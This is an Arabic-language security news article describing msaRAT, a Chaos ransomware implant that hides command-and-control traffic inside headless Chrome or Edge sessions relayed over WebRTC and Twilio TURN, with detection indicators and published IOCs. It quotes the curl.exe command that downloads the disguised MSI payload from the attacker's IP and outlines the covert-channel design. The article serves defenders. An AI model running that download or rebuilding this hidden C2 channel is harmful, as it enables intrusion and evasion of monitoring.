مجموعة Chaos Ransomware تستخدم msaRAT لتوجيه حركة C2 عبر متصفحات Chrome وEdge

كشفت شركة Cisco Talos عن أداة خبيثة جديدة مرتبطة بمجموعة Chaos Ransomware تُعرف باسم msaRAT، وهي مكتوبة بلغة Rust وتعمل كغرسة (implant) على أنظمة ويندوز. الميزة الأبرز لهذه الأداة أنها لا تنشئ أي اتصال خارجي مباشر، بل تعتمد على تشغيل متصفح Chrome أو Edge في وضع headless، وتستخدم بروتوكول Chrome DevTools Protocol (CDP) للتحكم بالمتصفح. بهذا الأسلوب، تمر جميع رسائل التحكم والسيطرة (C2) عبر قناة بيانات WebRTC يتم ترحيلها بواسطة خدمة Twilio TURN، ما يجعل حركة المرور تبدو وكأنها اتصالات شرعية بين المتصفح وخدمات مثل Cloudflare وTwilio، دون ظهور عنوان خادم المهاجم.

آلية عمل msaRAT
  • يبحث البرنامج أولًا عن Chrome أو Edge عبر متغيرات البيئة، ثم عبر السجل.
  • إذا وجد المتصفح، يبدأ تشغيله باستخدام –headless=new ويفعّل منفذ التصحيح عن بُعد.
  • ينشئ تبويبًا جديدًا ويعطل سياسة أمان المحتوى (CSP) ويحقن جافاسكريبت مخزنًا داخل الملف التنفيذي.
  • الجافاسكريبت يتصل بخادم Cloudflare Worker للحصول على إعدادات STUN وTURN، ثم يبني اتصالًا عبر Twilio.
  • القناة مشفرة مرتين: أولًا عبر DTLS، ثم عبر مخطط ChaCha-Poly1305 بمفتاح مشتق من تبادل ECDH.
  • الأوامر المستلمة تُمرر إلى cmd.exe للتنفيذ، مع دعم نقل بيانات كبيرة مثل لقطات الشاشة أو الملفات.
طريقة الوصول والتثبيت

يصل msaRAT بعد أن يكون المهاجم قد حصل بالفعل على وصول للنظام، وقبل تشغيل برنامج التشفير. يتم تنزيله عبر أمر بسيط:

كتابة تعليمات برمجية

curl.exe https://172.86.126[.]18:443/update_ms.msi -o C:\programdata\update_ms.msi

الملف MSI يتظاهر بأنه تحديث لويندوز، ويحمّل مكتبة DLL مضمنة مباشرة في الذاكرة، وهي msaRAT نفسها.

مؤشرات الكشف والتحليل
  • تشغيل Chrome أو Edge في وضع headless بواسطة عملية غير تفاعلية مثل مثبت أو خدمة.
  • حركة مرور محلية إلى منفذ التصحيح، متبوعة باتصالات WebRTC خارجية.
  • رسائل CDP مثل Runtime.addBinding وRuntime.evaluate.
  • ملفات مشبوهة مثل hostfxr.dll أو avk.dll أو MpClient.dll في مجلدات المستخدم أو Startup.

المؤشرات المنشورة من Talos تشمل:

  • IP: 172.86.126[.]18
  • Worker Hostname: is-01-ast[.]ols-img-12[.]workers[.]dev
  • نطاقات إضافية مرتبطة بالحملة: claude-pro[.]com, license[.]claude-pro[.]com, sylverixstrategy[.]com, vertextrust-advisors[.]com, إضافة إلى نطاقات تنتحل أسماء شركات أمنية مثل update-trellix[.]com, update-crowdstrike[.]com, وupdate-sentinelone[.]com.
دلالات أمنية

هذه التقنية لا تعتمد على ثغرة في المتصفح نفسه، بل على استغلاله كقناة شرعية لإخفاء حركة C2. لذلك، لا يمكن الاعتماد على تحديثات المتصفح كحل، بل يجب مراقبة سلوك العمليات والاتصالات غير المعتادة. Talos وصفت هذه الطريقة بأنها “تجارة سيبرانية مكتشفة” أكثر من كونها حملة محددة، إذ يمكن تبديل المؤشرات بسهولة، بينما يبقى السلوك (تشغيل متصفح headless عبر مثبت) هو العلامة الأهم.

 

محمد وهبى
محمد وهبى
المقالات: 1327

اترك ردّاً

لن يتم نشر عنوان بريدك الإلكتروني. الحقول الإلزامية مشار إليها بـ *


The reCAPTCHA verification period has expired. Please reload the page.